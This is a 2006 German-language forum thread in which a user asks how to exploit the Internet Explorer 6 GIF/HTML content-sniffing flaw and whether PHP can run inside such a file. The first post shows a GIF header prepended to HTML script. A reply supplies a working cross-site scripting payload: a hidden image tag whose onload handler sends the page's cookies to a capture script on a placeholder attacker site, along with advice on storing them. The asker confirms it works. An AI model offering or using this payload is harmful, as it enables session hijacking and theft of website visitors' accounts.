<GIF89aŸ8÷™fÿ™™> Exploit + php code ?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von hacker5, 13. März 2006 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 13. März 2006
    Hi ich hab auch mal ne frage ^^

    also ich denke mal jeder kennt das IE 6 Exploit.

    So meine frage ist jetzt , ist es möglich php code mit in der .gif ausrufen zu lassen ?

    Also ich bin bis jetzt auf keine lösung gekommen .

    Für die die das script nicht kennen:

    Code:
    <GIF89aŸ8÷™fÿ™™>
    
    <html>
    <head>
    <script>
    alert("sicherheitslücke");
    </script>
    </head>
    <body>
    </body>
    </html>
    
    nur ich denke mal wenn man es als .gif abruft ist es nicht möglich oder ?

    Also eigendlich müsste es ja gehen da man mit dem Exploit auch die cookies ggf, auslesen lassen kann .

    also wer ein tipp hat die ich php code darin abrufen kann immer her damit ^^..

    Vielen dank im vorraus.

    ps: nicht für illegale zwecke zu verwenden .... fürn vortrag
     
  2. 14. März 2006
    PHP Code wird nicht funktionieren, da der Code vom Browser nicht interpretiert würde.
    Jedoch um Cookies per Javascript zu verschicken:
    Code:
    <img src="http://www.google.de/images/hp0.gif" width="0"height="0" name="hia" onload="hia.src='http://deineseite/abfangscript.php?cookie='+document.cookie;">
    
    Erklärung:

    Ber Browser würde versuchen das Bild zu laden, jedoch wird als Quelle http://deineseite/abfangscript.php angegeben und hinten dran der aktuelle Cookie der Seite gehängt, auf der das Bild ist.
    Zudem wird das Bild dank width und height nicht angezeigt, da es 0x0 Pixel groß ist.

    Der Cookie wird also an das abfangscript.php gesendet und muss nurnoch per $_REQUEST[cookie] abgefangen und gespeichert werden.
     
  3. 14. März 2006
    Hi!

    Habe hierzu folgendes gefunden: Klick

    Da steht, man könne den Code, der von Iexplore ausgeführt werden kann einfügen, andererseits steht etwas weiter unten, dass man eine html-konforme Datei erstellen soll...

    Naja, vllt hilft es dir ja weiter.

    GreetZ, ~Br4inP4in~

    EDIT: Hm ok... XodoX war schneller
     
  4. 14. März 2006
    vielen dank an xodox und ~Br4inP4in~

    ich werd es nachher dann mal ausprobieren

    hört sich aber rentabel an müsste funktionieren


    EDIT://

    @ xodox prima erklärt vielen dank da stellt sich meinem Vortrag nichts in den weg.

    klappt prima

    mit php kenn ich mich aus nur das fehle mir onload="hia.src=''

    habt beide eine 10 bekommen
     
  5. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.